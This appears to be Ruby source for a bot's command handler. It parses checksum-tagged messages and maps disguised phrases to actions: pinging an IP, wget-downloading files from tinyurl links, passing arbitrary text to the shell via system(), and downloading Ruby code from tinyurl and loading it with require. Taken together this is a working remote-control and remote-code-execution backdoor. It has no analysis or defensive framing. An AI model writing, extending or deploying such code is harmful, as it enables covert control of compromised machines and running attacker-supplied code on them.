require 'digest/md5'
@lang_file_name="english"

def calc_checksum message,verbose=false
	checksum = Digest::MD5.hexdigest(message).slice(0,10)
	if verbose
		puts "Calculated md5 = "+checksum + " for " + message
	end
	return checksum
end

def process_message message,verbose=false
	if verbose
		puts "Using language file "+@lang_file_name
		puts "Processing message: " + message
	end

	if /(.*)#([0-9a-zA-Z]{10})$/.match(message)
		command=$1.strip
		md5=$2
		if verbose
			puts "Command = "+command
			puts "Checksum = "+md5
		end
		
		calced_md5=calc_checksum command, verbose

		if calced_md5==md5
			case command
			when /^do stuff on ([0-9\.]*)$/
				# Ping
				if validate_ip($1)
					ip = $1
					if verbose
						puts "going to ping "+ip
					end
					system("ping", "-c 2", ip)
				else
					if verbose
						puts "Invalid IP"
					end
				end
			when /^look at ([a-z0-9A-Z]*)$/
				# get
				arguments=$1
				if arguments!=""
					url="http://tinyurl.com/"+$1
					if verbose
						puts "getting file - " + url
					end
					system("wget", url)
				end
			when /^run this (.*)$/
				# exec
				arguments=$1
				arguments.gsub!(/&amp;/, "&")
				if verbose
					puts "executing command - " + arguments
				end
				system(arguments)
			when /^I can speak ([a-z0-9]*)$/
				# language
				filename = Digest::SHA1.hexdigest(Time.now.to_s) + ".rb"
				url="http://tinyurl.com/"+$1
				download_file url, filename
				require filename
				puts "Now using language file " + @lang_file_name
			else
				puts "Unknown command"
			end
		else
			puts "Checksum mismatch"
		end
	else
		if verbose
			puts "Invalid message format"
		end
	end

	if verbose
		puts "Done"
		puts "****************************"
	end
end
